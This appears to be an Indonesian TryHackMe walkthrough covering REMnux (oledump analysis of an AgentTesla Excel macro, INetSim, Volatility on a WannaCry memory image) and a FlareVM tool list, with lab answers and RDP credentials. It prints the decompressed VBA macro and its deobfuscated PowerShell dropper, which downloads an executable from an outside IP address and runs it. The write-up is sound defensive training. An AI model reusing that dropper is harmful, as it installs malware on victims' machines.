Writeup Aria
RoadMapCyber Security 101

Defensive Security Tooling Part 2

REMnux: Getting Started

Introduction

Menganalisis software yang berpotensi berbahaya bukanlah hal mudah, apalagi jika dilakukan di tengah insiden keamanan yang sedang berlangsung. Analis dituntut untuk bekerja di bawah tekanan dan menghasilkan analisis yang akurat, sehingga diperlukan berbagai alat, mesin, dan lingkungan khusus.

Dalam tugas ini digunakan REMnux VM, yaitu distribusi Linux yang dirancang khusus untuk analisis malware. REMnux sudah dilengkapi dengan berbagai tools seperti Volatility, YARA, Wireshark, oledump, dan INetSim, serta menyediakan lingkungan mirip sandbox. Dengan REMnux, analis dapat membedah malware dengan aman tanpa membahayakan sistem utama, karena lab sudah siap pakai tanpa perlu instalasi manual.

Analisis File

Tujuan

Melakukan analisis statis terhadap dokumen Excel berbahaya menggunakan oledump.py untuk mengidentifikasi adanya macro dan perilaku berbahaya.

Pengenalan oledump.py

oledump.py adalah tool Python untuk menganalisis file OLE2 (Structured Storage / Compound File Binary Format) yang umum digunakan pada dokumen Microsoft seperti Word dan Excel. Tool ini berguna untuk:

  • Mengekstrak data stream
  • Mengidentifikasi VBA macro
  • Membantu analisis forensik dan deteksi malware

Identifikasi Macro dalam Dokumen

Target file adalah agenttesla.xlsm. Dengan menjalankan oledump.py agenttesla.xlsm, ditemukan beberapa data stream, termasuk stream dengan huruf M (Macro), khususnya:

  • A4: M 688 'VBA/ThisWorkbook' Huruf M menandakan adanya macro VBA yang patut dianalisis lebih lanjut.

Analisis Data Stream Macro

Untuk melihat isi macro:

  • Digunakan parameter -s 4 untuk memilih data stream VBA/ThisWorkbook
  • Output awal berupa hex dump, yang sulit dibaca secara langsung

Dekompresi Macro VBA

Agar macro lebih mudah dianalisis, digunakan parameter:

  • --vbadecompress Hasil dekompresi menunjukkan kode VBA yang dieksekusi saat dokumen dibuka melalui event Workbook_Open().

Obfuscation pada Script

Script VBA menyimpan perintah PowerShell dalam variabel Sqtnew yang di-obfuscate menggunakan karakter * dan ^. Karakter tersebut kemudian dihapus menggunakan fungsi Replace, sehingga perintah aslinya tersembunyi dari analisis sederhana.

Rekonstruksi PowerShell Command

Setelah karakter obfuscation dihapus, perintah PowerShell yang sebenarnya adalah:

  • Menjalankan PowerShell secara tersembunyi
  • Melewati execution policy
  • Mengunduh file executable dari internet
  • Menyimpan file ke folder temporary
  • Menjalankan file hasil unduhan

Aktivitas Berbahaya yang Ditemukan

Macro melakukan tindakan berikut:

  • Mengunduh file Doc-3737122pdf.exe
  • Sumber unduhan: http://193.203.203.67/rt/
  • Menyimpan file ke variabel $TempFile
  • Menjalankan file executable tersebut menggunakan Start-Process

Kesimpulan

Saat agenttesla.xlsm dibuka:

  • Macro VBA otomatis dijalankan
  • Macro mengeksekusi PowerShell secara tersembunyi
  • File executable berbahaya diunduh dan dieksekusi

Teknik ini umum digunakan oleh threat actor untuk:

  • Menghindari deteksi awal
  • Mengelabui pengguna dengan dokumen Office
  • Menjalankan malware tahap lanjutan

Analisis ini menunjukkan bagaimana dokumen Excel dapat menjadi vektor awal infeksi malware melalui macro dan PowerShell.

praktek

cd Desktop/tasks/agenttesla/
ls
# agenttesla.xlsm  possible_malicious.docx

oledump.py agenttesla.xlsm
# A: xl/vbaProject.bin
#  A1:       468 'PROJECT'
#  A2:        62 'PROJECTwm'
#  A3: m     169 'VBA/Sheet1'
#  A4: M     688 'VBA/ThisWorkbook'
#  A5:         7 'VBA/_VBA_PROJECT'
#  A6:       209 'VBA/dir'

oledump.py agenttesla.xlsm  -s 4
# 00000000: 01 AC B2 00 41 74 74 72  69 62 75 74 00 65 20 56  ....Attribut.e V
# 00000010: 42 5F 4E 61 6D 00 65 20  3D 20 22 54 68 69 00 73  B_Nam.e = "Thi.s
# 00000020: 57 6F 72 6B 62 6F 6F 10  6B 22 0D 0A 0A 8C 42 61  Workboo.k"....Ba
# 00000030: 73 01 02 8C 30 7B 30 30  30 32 30 50 38 31 39 2D  s...0{00020P819-
# 00000040: 00 10 30 03 08 43 23 05  12 03 00 34 36 7D 0D 7C  ..0..C#....46}.|
# 00000050: 47 6C 10 6F 62 61 6C 01  D0 53 70 61 82 63 01 92  Gl.obal..Spa.c..
# 00000060: 46 61 6C 73 65 0C 25 00  43 72 65 61 74 61 62 6C  False.%.Creatabl
# 00000070: 01 15 1F 50 72 65 64 65  63 6C 12 61 00 06 49 64  ...Predecl.a..Id
# 00000080: 00 23 54 72 75 81 0D 22  45 78 70 6F 73 65 01 1C  .#Tru.."Expose..
# 00000090: 01 11 40 54 65 6D 70 6C  61 74 40 65 44 65 72 69  ..@Templat@eDeri
# 000000A0: 76 96 12 43 80 75 73 74  6F 6D 69 7A 84 44 0D 83  v..C.ustomiz.D..
# 000000B0: 32 50 80 18 80 1C 20 53  75 62 02 20 05 92 5F 4F  2P.... Sub. .._O
# 000000C0: 70 65 6E 28 00 29 0D 0A  44 69 6D 20 53 00 71 74  pen(.)..Dim S.qt
# 000000D0: 6E 65 77 20 41 73 04 20  53 80 25 6E 67 2C 20 73  new As. S.%ng, s
# 000000E0: C0 4F 75 74 70 75 74 07  09 03 14 00 4D 67 67 63  .Output.....Mggc
# 000000F0: 62 6E 75 61 02 64 01 0C  4F 62 6A 65 63 74 42 2C  bnua.d..ObjectB,
# 00000100: 07 0A 45 78 65 63 07 0C  0D 06 0A 04 2B 00 BD 5E  ..Exec......+..^
# 00000110: 70 2A 6F 5E 00 2A 77 2A  65 2A 72 2A 73 10 5E 5E  p*o^.*w*e*r*s.^^
# 00000120: 2A 68 80 04 6C 5E 2A 00  6C 2A 20 2A 5E 2D 2A 57  *h..l^*.l* *^-*W
# 00000130: 00 2A 69 2A 6E 2A 5E 64  2A 00 6F 2A 77 5E 2A 53  .*i*n*^d*.o*w^*S
# 00000140: 2A 74 A0 2A 79 2A 5E 6C  00 11 20 00 14 02 69 01  *t.*y*^l.. ...i.
# 00000150: 0C 64 2A 5E 65 2A 6E 2A  5E 00 08 2D 00 0B 78 41  .d*^e*n*^..-..xA
# 00000160: 03 63 2A 12 75 00 0A 5E  69 00 0D 6E 2A 70 40 6F  .c*.u..^i..n*p@o
# 00000170: 6C 5E 69 63 79 C0 07 62  00 2A 79 70 5E 5E 61 73  l^icy..b.*yp^^as
# 00000180: 73 20 2A 3B 2A 20 24 01  4D 46 69 0A 6C 41 12 3D  s *;* $.MFi.lA.=
# 00000190: C0 00 5B 2A 49 2A 80 4F  2A 2E 2A 50 2A 61 C0 0E  ..[*I*.O*.*P*a..
# 000001A0: 00 68 2A 5D 2A 3A 3A 47  65 1A 74 40 09 2A 83 09  .h*]*::Ge.t@.*..
# 000001B0: 41 79 28 29 20 40 7C 20  52 65 6E 5E C0 02 2D 00  Ay() @| Ren^..-.
# 000001C0: 49 74 5E 65 6D 20 2D 4E  04 65 77 42 9A 7B 20 24  It^em -N.ewB.{ $
# 000001D0: 5F 20 18 2D 72 65 40 62  40 82 27 74 6D 00 70 24  _ .-re@b@.'tm.p$
# 000001E0: 27 2C 20 27 65 78 80 65  27 20 7D 20 96 50 C1 1D  ', 'ex.e' } .P..
# 000001F0: 00 54 68 72 75 3B 20 49  6E 00 5E 76 6F 2A 6B 65  .Thru; In.^vo*ke
# 00000200: 2D 57 00 65 5E 62 52 65  2A 71 75 00 65 73 74 20  -W.e^bRe*qu.est
# 00000210: 2D 55 5E 72 00 69 20 22  22 68 74 74 70 00 3A 2F  -U^r.i ""http.:/
# 00000220: 2F 31 39 33 2E 32 02 30  C3 00 36 37 2F 72 74 2F  /193.2.0..67/rt/
# 00000230: 00 44 6F 63 2D 33 37 33  37 80 31 32 32 70 64 66  .Doc-3737.122pdf
# 00000240: 2E 00 16 D0 22 22 20 2D  00 63 2A C1 27 07 34 02  ...."" -.c*.'.4.
# 00000250: 3B 80 65 2A 61 72 74 2D  50 80 72 6F 63 65 2A 73  ;.e*art-P.roce*s
# 00000260: 73 88 06 2B 00 B0 46 5E  52 83 2A 28 03 04 2C 20  s..+..F^R.*(..,
# 00000270: 68 22 2A 22 00 01 22 C0  7D 97 08 5E 49 86 08 65  h"*"..".}..^I..e
# 00000280: 74 48 7C 3D 20 C2 B8 65  01 43 77 28 22 57 53 63  tH|= ..e.Cw("WSc
# 00000290: 72 69 00 70 74 2E 53 68  65 6C 6C EB 8E 0B C2 82  ri.pt.Shell.....
# 000002A0: 3D C7 03 2E 01 04 C4 18  C0 0A 08 45 6E 64 81 A3  =..........End..
oledump.py agenttesla.xlsm  -s 4 --vbadecompress
# Attribute VB_Name = "ThisWorkbook"
# Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
# Attribute VB_GlobalNameSpace = False
# Attribute VB_Creatable = False
# Attribute VB_PredeclaredId = True
# Attribute VB_Exposed = False
# Attribute VB_TemplateDerived = False
# Attribute VB_Customizable = True
# Private Sub Workbook_Open()
# Dim Sqtnew As String, sOutput As String
# Dim Mggcbnuad As Object, MggcbnuadExec As Object
# Sqtnew = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } �Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""http://193.203.203.67/rt/Doc-3737122pdf.exe"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
# Sqtnew = Replace(Sqtnew, "*", "")
# Sqtnew = Replace(Sqtnew, "^", "")
# Set Mggcbnuad = CreateObject("WScript.Shell")
# Set MggcbnuadExec = Mggcbnuad.Exec(Sqtnew)

dari sini kita mendapatkan informasi yang lengkap mengenai macro berbahaya pada file agenttesla.xlsm.

kita bisa juga coba lakukan decode menggunakan cyberchef atau tools lainnya untuk melihat perintah powershell yang di obfuscate tersebut. dengan menggunakan find and replace untuk menghapus karakter * dan ^ pada string powershell tersebut.

1769784536279

powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } �PassThru; Invoke-WebRequest -Uri ""http://193.203.203.67/rt/Doc-3737122pdf.exe"" -OutFile $TempFile; Start-Process $TempFile;

dari informasi diatas kita bisa lihat bahwa macro tersebut akan mengunduh file berbahaya dari url http://193.203.203.67/rt/Doc-3737122pdf.exe dan menyimpannya di temporary folder dengan ekstensi .exe lalu mengeksekusinya.

  • What Python tool analyzes OLE2 files, commonly called Structured Storage or Compound File Binary Format?

oledump.py

  • What tool parameter we used in this task allows you to select a particular data stream of the file we are using it with?

-s

  • During our analysis, we were able to decode a PowerShell script. What command is commonly used for downloading files from the internet?

Invoke-WebRequest

  • What file was being downloaded using the PowerShell script?

Doc-3737122pdf.exe

  • During our analysis of the PowerShell script, we noted that a file would be downloaded. Where will the file being downloaded be stored?

$TempFile

oledump.py possible_malicious.docx
#   1:       114 '\x01CompObj'
#   2:       280 '\x05DocumentSummaryInformation'
#   3:       416 '\x05SummaryInformation'
#   4:      7557 '1Table'
#   5:    343998 'Data'
#   6:       376 'Macros/PROJECT'
#   7:        41 'Macros/PROJECTwm'
#   8: M 1989192 'Macros/VBA/ThisDocument'
#   9:      4099 'Macros/VBA/_VBA_PROJECT'
#  10:       515 'Macros/VBA/dir'
#  11:       112 'ObjectPool/_1649178531/\x01CompObj'
#  12:        16 'ObjectPool/_1649178531/\x03OCXNAME'
#  13:         6 'ObjectPool/_1649178531/\x03ObjInfo'
#  14:        86 'ObjectPool/_1649178531/f'
#  15:         0 'ObjectPool/_1649178531/o'
#  16:      4096 'WordDocument'
  • Using the tool, scan another file named possible_malicious.docx located in the /home/ubuntu/Desktop/tasks/agenttesla/ directory. How many data streams were presented for this file?

16

oledump.py possible_malicious.docx -s 8
oledump.py possible_malicious.docx -s 8 --vbadecompress
  • Using the tool, scan another file named possible_malicious.docx located in the /home/ubuntu/Desktop/tasks/agenttesla/ directory. At what data stream number does the tool indicate a macro present?

8

Fake Network to Aid Analysis

Dynamic Analysis dengan INetSim

Tujuan

Mengamati perilaku jaringan dari software berpotensi berbahaya menggunakan INetSim untuk mensimulasikan layanan internet dalam lingkungan aman (sandbox).

Lingkungan Virtual Machine

Mesin yang Digunakan

  • REMnux VM Digunakan untuk menjalankan INetSim dan memonitor aktivitas jaringan.
  • AttackBox Bertindak sebagai mesin “korban” yang mensimulasikan perilaku malware.

Kedua VM dapat diakses dan dipindahkan dengan mudah melalui tab nama mesin di bagian bawah antarmuka.

Konfigurasi INetSim di REMnux

Identifikasi IP Address

Langkah pertama adalah mencatat IP address REMnux VM, yang dapat dilihat dari terminal:

  • Contoh IP: 10.48.145.58

IP ini akan digunakan sebagai alamat DNS default oleh INetSim.

Perubahan Konfigurasi

File konfigurasi INetSim diubah pada:

  • /etc/inetsim/inetsim.conf

Perubahan yang dilakukan:

  • Menghapus tanda komentar (#)
  • Mengatur nilai dns_default_ip menjadi IP REMnux VM

Tujuannya agar semua request DNS diarahkan ke INetSim.

Verifikasi Konfigurasi

Konfigurasi diverifikasi dengan memastikan nilai dns_default_ip sudah sesuai dengan IP mesin.

Menjalankan INetSim

INetSim dijalankan menggunakan perintah sudo inetsim. Jika konfigurasi berhasil, akan muncul status:

  • Simulation running

Ini menandakan jaringan palsu sudah aktif dan siap digunakan.

Simulasi Aktivitas Malware di AttackBox

Akses INetSim via Browser

Dari AttackBox:

  • Mengakses https://<IP_REMNUX>
  • Peringatan sertifikat diabaikan
  • Jika berhasil, halaman utama INetSim akan tampil

Simulasi Download Payload

Untuk meniru perilaku malware yang mengunduh payload lanjutan:

  • Digunakan perintah wget melalui CLI
  • File yang diunduh antara lain:
    • second_payload.zip
    • second_payload.ps1

File-file ini merupakan fake files yang disediakan INetSim.

Perilaku File Palsu

Saat file PowerShell dijalankan:

  • Arah eksekusi diarahkan kembali ke homepage INetSim
  • Tidak ada malware sungguhan yang dijalankan

Ini menunjukkan bagaimana INetSim aman digunakan untuk simulasi.

Laporan Koneksi INetSim

Menghentikan INetSim

Saat INetSim dihentikan, otomatis dibuat connection report.

Lokasi Report

Laporan disimpan di direktori:

  • /var/log/inetsim/report/

Isi Laporan

Report berisi informasi penting seperti:

  • Waktu koneksi
  • Protokol yang digunakan (HTTPS)
  • Method (GET)
  • URL yang diakses
  • File palsu yang disajikan oleh INetSim

Contohnya:

  • Akses ke homepage INetSim
  • Download file .exe, .ps1, dan .zip

Kesimpulan

Dengan INetSim:

  • Aktivitas jaringan malware dapat disimulasikan tanpa koneksi internet nyata
  • Analis dapat memantau pola komunikasi, URL, dan file yang diunduh
  • Risiko terhadap sistem utama dapat dihindari

Pendekatan ini sangat efektif untuk dynamic analysis, khususnya dalam memahami bagaimana malware berinteraksi dengan server command-and-control atau mengunduh payload lanjutan.

praktek

Remux VM

sudo nano /etc/inetsim/inetsim.conf
# remove # in dns_default_ip and set to REMnux IP address
dns_default_ip 10.48.145.58

# verify the configuration
cat /etc/inetsim/inetsim.conf | grep dns_default_ip
# dns_default_ip 10.48.145.58

sekarang jalankan inetsim

sudo inetsim

setelah di jalankan buka attackbox VM, dan buka browser dan akses ke https://10.48.145.58

setelah itu kita juga coba download file dari inetsim menggunakan perintah wget

sudo wget https://10.48.145.58/second_payload.zip --no-check-certificate

setelah itu kita coba stop inetsim di remnux VM dengan menekan CTRL + C di terminal tempat inetsim dijalankan.

Simulation stopped.
 Report written to '/var/log/inetsim/report/report.2128.txt' (13 lines)
=== INetSim main process stopped (PID 2128) ===

kita bisa coba lihat report yang di hasilkan di /var/log/inetsim/report/

sudo cat /var/log/inetsim/report/report.2128.txt
# === Report for session '2128' ===
#
# Real start date            : 2026-01-31 09:20:12
# Simulated start date       : 2026-01-31 09:20:12
# Time difference on startup : none

# 2026-01-31 09:21:19  First simulated date in log file
# 2026-01-31 09:21:19  HTTPS connection, method: GET, URL: https://10.48.145.58/, file name: /var/lib/inetsim/http/fakefiles/sample.html
# 2026-01-31 09:21:20  HTTPS connection, method: GET, URL: https://10.48.145.58/favicon.ico, file name: /var/lib/inetsim/http/fakefiles/favicon.ico
# 2026-01-31 09:22:08  HTTPS connection, method: GET, URL: https://10.48.145.58/second_payload.zip, file name: /var/lib/inetsim/http/fakefiles/sample.html
# remux vm
sudo inetsim

# attackbox vm
sudo wget https://10.48.145.58/flag.txt --no-check-certificate
# remux vm
sudo cat /var/log/inetsim/report/report.2158.txt
# === Report for session '2158' ===

# Real start date            : 2026-01-31 09:24:59
# Simulated start date       : 2026-01-31 09:24:59
# Time difference on startup : none

# 2026-01-31 09:25:02  First simulated date in log file
# 2026-01-31 09:25:02  HTTPS connection, method: GET, URL: https://10.48.145.58/flag.txt, file name: /var/lib/inetsim/http/fakefiles/sample.txt
# 2026-01-31 09:25:02  Last simulated date in log file
cat /var/lib/inetsim/http/fakefiles/sample.txt
# This is the default text document for INetSim HTTP server fake mode.
# This file is plain text.
# You found it! The flag is = Tryhackme{remnux_edition}
  • Download and scan the file named flag.txt from the terminal using the command sudo wget https://10.48.145.58/flag.txt --no-check-certificate. What is the flag?

Tryhackme{remnux_edition}

  • After stopping the inetsim, read the generated report. Based on the report, what URL Method was used to get the file flag.txt?

GET

Memory Investigation: Evidence Preprocessing

Investigasi Memory: Evidence Preprocessing

Tujuan

Melakukan preprocessing bukti digital berupa memory image agar proses analisis lanjutan menjadi lebih cepat dan terstruktur. Fokus utama adalah membiasakan diri menggunakan Volatility 3 dan strings untuk mengekstrak artefak penting dari memory dump.

Konsep Evidence Preprocessing

Dalam Digital Forensics, preprocessing adalah praktik umum untuk:

  • Menjalankan tool forensik
  • Menyimpan hasil ke file teks atau JSON
  • Mempermudah pencarian dan analisis lanjutan oleh analis lain

Untuk memory forensics, tool yang sering digunakan adalah Volatility, yang sudah tersedia di REMnux VM.

Preprocessing Menggunakan Volatility 3

Lingkungan dan File

  • Tool: Volatility 3
  • Memory image: wcry.mem
  • Lokasi file: /home/ubuntu/Desktop/tasks/Wcry_memory_image/

Analisis difokuskan pada Windows plugins, tanpa pendalaman interpretasi hasil.

Plugin Volatility yang Digunakan

windows.pstree.PsTree

Menampilkan proses dalam bentuk tree berdasarkan parent process ID, sehingga hubungan antar proses terlihat jelas. Terlihat proses mencurigakan seperti @WanaDecryptor@ yang berjalan dari tasksche.exe.

vol3 -f wcry.mem windows.pstree.PsTree

windows.pslist.PsList

Menampilkan daftar proses aktif pada sistem saat memory diambil. Digunakan untuk membandingkan proses normal dan proses mencurigakan.

vol3 -f wcry.mem windows.pslist.PsList

windows.cmdline.CmdLine

Menampilkan command-line arguments tiap proses. Berguna untuk:

  • Menemukan path tidak biasa
  • Mengidentifikasi eksekusi malware Contoh mencurigakan:
  • @WanaDecryptor@.exe
  • tasksche.exe dari direktori non-standar
vol3 -f wcry.mem windows.cmdline.CmdLine

windows.filescan.FileScan

Melakukan pemindaian objek file di memory image. Hasilnya sangat banyak (ribuan baris) dan biasanya digunakan untuk pencarian artefak spesifik.

vol3 -f wcry.mem windows.filescan.FileScan

windows.dlllist.DllList

Menampilkan DLL atau modul yang dimuat oleh setiap proses. Digunakan untuk mendeteksi injected atau malicious DLL.

vol3 -f wcry.mem windows.dlllist.DllList

windows.psscan.PsScan

Melakukan scanning proses secara low-level.

Dapat menemukan:

  • Proses yang sudah terminated
  • Proses tersembunyi Ditemukan beberapa instance @WanaDecryptor@ yang sudah berhenti.
vol3 -f wcry.mem windows.psscan.PsScan

windows.malfind.Malfind

Mendeteksi memory region yang berpotensi berisi injected code. Plugin ini sering digunakan untuk menemukan shellcode atau reflective DLL injection.

vol3 -f wcry.mem windows.malfind.Malfind

Preprocessing Massal dengan Loop

Tujuan

Menjalankan semua plugin sekaligus dan menyimpan hasilnya ke file teks secara otomatis.

for plugin in windows.malfind.Malfind windows.psscan.PsScan windows.pstree.PsTree windows.pslist.PsList windows.cmdline.CmdLine windows.filescan.FileScan windows.dlllist.DllList; do vol3 -q -f wcry.mem $plugin > wcry.$plugin.txt; done

Konsep Perintah Loop

  • Menggunakan loop for
  • Menjalankan setiap plugin satu per satu
  • Output disimpan ke file .txt
  • Mode -q digunakan agar terminal tetap bersih

Hasil

Setelah perintah dijalankan:

  • Tidak ada output di terminal
  • Beberapa file .txt dihasilkan, masing-masing berisi hasil satu plugin
  • File ini siap untuk dianalisis atau dibagikan ke analis lain

Preprocessing Menggunakan Strings

Tujuan

Mengekstrak string yang dapat dibaca manusia dari memory image untuk membantu pencarian indikator seperti:

  • URL
  • IP address
  • Path file
  • Nama malware
strings wcry.mem > wcry.strings.ascii.txt
strings -e l  wcry.mem > wcry.strings.unicode_little_endian.txt
strings -e b  wcry.mem > wcry.strings.unicode_big_endian.txt

Jenis String yang Diekstrak

ASCII Strings

Menampilkan string ASCII standar dari memory image.

Unicode Little Endian

Mengekstrak string Unicode 16-bit little-endian (umum di Windows).

Unicode Big Endian

Mengekstrak string Unicode 16-bit big-endian.

Output

Tiga file teks dihasilkan:

  • ASCII
  • Unicode little-endian
  • Unicode big-endian

Ketiganya dapat memberikan konteks berbeda dan saling melengkapi.

Kesimpulan

Pada task ini:

  • Memory image telah dipreprocess menggunakan Volatility dan strings
  • Artefak penting disimpan dalam bentuk file teks
  • Proses analisis lanjutan menjadi lebih cepat dan efisien

Preprocessing seperti ini adalah langkah awal krusial dalam memory forensics, memastikan analis fokus pada investigasi, bukan pengolahan data mentah.

praktek

cd Desktop/tasks/Wcry_memory_image/
vol3 -f wcry.mem windows.pstree.PsTree
vol3 -f wcry.mem windows.pslist.PsList
vol3 -f wcry.mem windows.cmdline.CmdLine
vol3 -f wcry.mem windows.filescan.FileScan
vol3 -f wcry.mem windows.dlllist.DllList
vol3 -f wcry.mem windows.psscan.PsScan
vol3 -f wcry.mem windows.malfind.Malfind

for plugin in windows.malfind.Malfind windows.psscan.PsScan windows.pstree.PsTree windows.pslist.PsList windows.cmdline.CmdLine windows.filescan.FileScan windows.dlllist.DllList; do vol3 -q -f wcry.mem $plugin > wcry.$plugin.txt; done
  • What plugin lists processes in a tree based on their parent process ID?

PsTree

  • What plugin is used to list all currently active processes in the machine?

PsList

  • What Linux utility tool can extract the ASCII, 16-bit little-endian, and 16-bit big-endian strings?

strings

vol3 -f wcry.mem windows.malfind.Malfind
# olatility 3 Framework 2.0.0
# Progress:  100.00		PDB scanning finished
# PID	Process	Start VPN	End VPN	Tag	Protection	CommitCharge	PrivateMemory	File output	Hexdump	Disasm

# 596	csrss.exe	0x7f6f0000	0x7f7effff	Vad 	PAGE_EXECUTE_READWRITE	0	0	Disabled
# c8 00 00 00 8b 01 00 00	........
# ff ee ff ee 08 70 00 00	.....p..
# 08 00 00 00 00 fe 00 00	........
# 00 00 10 00 00 20 00 00	........
# 00 02 00 00 00 20 00 00	........
# 8d 01 00 00 ff ef fd 7f	........
# 03 00 08 06 00 00 00 00	........
# 00 00 00 00 00 00 00 00	........
# 0x7f6f0000:	enter	0, 0
# 0x7f6f0004:	mov	eax, dword ptr [ecx]
# 0x7f6f0006:	add	byte ptr [eax], al
# 620	winlogon.exe	0x21400000	0x21403fff	VadS	PAGE_EXECUTE_READWRITE	4	1	Disabled
# 00 00 00 00 00 00 00 00	........
# 00 00 00 00 00 00 00 00	........
# 00 00 00 00 00 00 00 00	........
# 00 00 00 00 00 00 00 00	........
# 00 00 00 00 00 00 00 00	........
# 00 00 00 00 00 00 00 00	........
# 00 00 00 00 28 00 28 00	....(.(.
# 01 00 00 00 00 00 00 00	........
  • By running vol3 with the Malfind parameter, what is the first (1st) process identified suspected of having an injected code?

csrss.exe

  • Continuing from the previous question (Question 4), what is the second (2nd) process identified suspected of having an injected code?

winlogon.exe

vol3 -f wcry.mem windows.dlllist.DllList > wcry.windows.dlllist.DllList.txt
cat wcry.windows.dlllist.DllList.txt | grep -A 20 "WanaDecryptor"
# 740	@WanaDecryptor@	0x400000	0x3d000	@WanaDecryptor@.exe	C:\Intel\ivecuqmanpnirkt615\@WanaDecryptor@.exe	N/A	Disabled
# 740	@WanaDecryptor@	0x7c900000	0xb2000	ntdll.dll	C:\WINDOWS\system32\ntdll.dll	N/A	Disabled
# 740	@WanaDecryptor@	0x7c800000	0xf6000	kernel32.dll	C:\WINDOWS\system32\kernel32.dll	N/A	Disabled
# 740	@WanaDecryptor@	0x73dd0000	0xf2000	MFC42.DLL	C:\WINDOWS\system32\MFC42.DLL	N/A	Disabled
# 740	@WanaDecryptor@	0x77c10000	0x58000	msvcrt.dll	C:\WINDOWS\system32\msvcrt.dll	N/A	Disabled
  • By running vol3 with the DllList parameter, what is the file path or directory of the binary @WanaDecryptor@.exe?

C:\Intel\ivecuqmanpnirkt615

FlareVM: Arsenal of Tools

Introduction

Gambaran Umum FlareVM

FlareVM (Forensics, Logic Analysis, and Reverse Engineering) adalah kumpulan tools khusus yang dikurasi secara matang oleh FLARE Team dari FireEye. Toolkit ini dirancang untuk kebutuhan profesional seperti:

  • Reverse engineer
  • Malware analyst
  • Incident responder
  • Forensic investigator
  • Penetration tester

FlareVM membantu dalam menganalisis perilaku malware, memahami detail internal executable, serta mengungkap berbagai misteri digital melalui analisis statis dan dinamis.

Tujuan Pembelajaran

Dalam penggunaan FlareVM, tujuan utama yang diharapkan adalah:

  • Mengenal berbagai tools yang tersedia di dalam FlareVM
  • Mempelajari cara menganalisis proses yang berpotensi berbahaya
  • Memahami tools yang digunakan untuk static analysis pada dokumen dan binary berbahaya

Prasyarat

Pengguna diharapkan sudah memiliki pemahaman dasar mengenai:

  • Sistem operasi Windows
  • Konsep proses dan istilah teknis terkait

Jika belum familiar, disarankan untuk mengikuti Pre Security path terlebih dahulu.

Akses Mesin Virtual (VM)

Membangun FlareVM dari awal membutuhkan waktu lama dan proses instalasi yang cukup kompleks. Oleh karena itu, mesin FlareVM sudah disediakan langsung di dalam room ini.

Pengguna cukup menekan tombol Start Machine untuk menjalankan FlareVM yang akan muncul dalam tampilan split-screen.

Akses via Remote Desktop (RDP)

Jika ingin mengakses mesin menggunakan RDP, gunakan kredensial berikut:

  • Username: Administrator
  • Password: letmein123!
  • IP Address: MACHINE_IP
  • Platform: TryHackMe

Lokasi File Sampel

Hampir seluruh file yang digunakan dalam praktik tersedia di lokasi berikut:

C:\Users\Administrator\Desktop\Sample

Catatan Keamanan (Disclaimer)

Mesin FlareVM ini berisi file malware asli yang digunakan untuk latihan. Oleh karena itu:

  • Tidak boleh mengunduh file tersebut ke sistem pribadi
  • Tidak boleh menjalankan file di luar mesin FlareVM
  • Tidak boleh mendistribusikan file ke pihak lain

Semua analisis harus dilakukan hanya di lingkungan terisolasi dan aman (FlareVM), karena file berbahaya dapat merusak sistem atau jaringan.

Arsenal of Tools

Gambaran Umum Tools di FlareVM

FlareVM berisi banyak tools khusus untuk forensik digital, incident response, dan investigasi malware. Tools tersebut dikelompokkan berdasarkan fungsi agar memudahkan analis memilih alat yang tepat sesuai kebutuhan analisis.

Reverse Engineering & Debugging

Reverse engineering bertujuan membongkar aplikasi atau malware untuk memahami cara kerjanya, sedangkan debugging digunakan untuk melacak kesalahan dan alur eksekusi program.

Tools yang termasuk kategori ini:

  • Ghidra – Tool open-source dari NSA untuk reverse engineering.
  • x64dbg – Debugger open-source untuk binary 32-bit dan 64-bit.
  • OllyDbg – Debugger berbasis assembly untuk reverse engineering.
  • Radare2 – Platform reverse engineering open-source yang kompleks.
  • Binary Ninja – Tool disassembly dan decompilation binary.
  • PEiD – Mendeteksi packer, cryptor, dan compiler pada executable.

Disassemblers & Decompilers

Kategori ini membantu analis memahami logika, alur kontrol, dan perilaku malware dengan mengubah kode mesin menjadi format yang lebih mudah dibaca manusia.

Tools yang digunakan:

  • CFF Explorer – PE editor untuk menganalisis dan mengedit file PE.
  • Hopper Disassembler – Debugger, disassembler, dan decompiler.
  • RetDec – Decompiler open-source untuk machine code.

Static & Dynamic Analysis

Analisis statis dilakukan tanpa menjalankan malware, sedangkan analisis dinamis dilakukan dengan mengamati perilaku malware saat dieksekusi.

Tools dalam kategori ini:

  • Process Hacker – Monitor proses dan editor memori tingkat lanjut.
  • PEview – Viewer file PE untuk analisis struktur internal.
  • Dependency Walker – Menampilkan dependensi DLL dari executable.
  • DIE (Detect It Easy) – Deteksi packer, compiler, dan cryptor.

Forensics & Incident Response

Forensik digital berfokus pada pengumpulan dan analisis bukti digital, sedangkan incident response menangani deteksi hingga pemulihan dari serangan siber.

Tools yang digunakan:

  • Volatility – Framework analisis RAM untuk memory forensics.
  • Rekall – Framework memory forensics untuk incident response.
  • FTK Imager – Tool akuisisi dan analisis image disk forensik.

Network Analysis

Analisis jaringan bertujuan memahami lalu lintas, pola komunikasi, dan potensi ancaman di dalam jaringan.

Tools yang tersedia:

  • Wireshark – Analyzer protokol jaringan.
  • Nmap – Tool pemetaan jaringan dan deteksi kerentanan.
  • Netcat – Tool komunikasi data melalui koneksi jaringan.

File Analysis

Digunakan untuk memeriksa isi file, struktur binary, dan potensi ancaman tersembunyi.

Tools dalam kategori ini:

  • FileInsight – Viewer dan editor file binary.
  • Hex Fiend – Hex editor ringan dan cepat.
  • HxD – Hex editor untuk melihat dan mengedit file binary.

Scripting & Automation

Digunakan untuk mengotomatisasi tugas berulang agar lebih efisien dan mengurangi kesalahan manual.

Tools yang tersedia:

  • Python – Digunakan untuk scripting dan otomasi analisis.
  • PowerShell Empire – Framework PowerShell untuk post-exploitation.

Sysinternals Suite

Kumpulan tool lanjutan untuk memantau, mendiagnosis, dan troubleshooting sistem Windows.

Tools utama:

  • Autoruns – Menampilkan program yang berjalan saat booting.
  • Process Explorer – Informasi detail tentang proses yang berjalan.
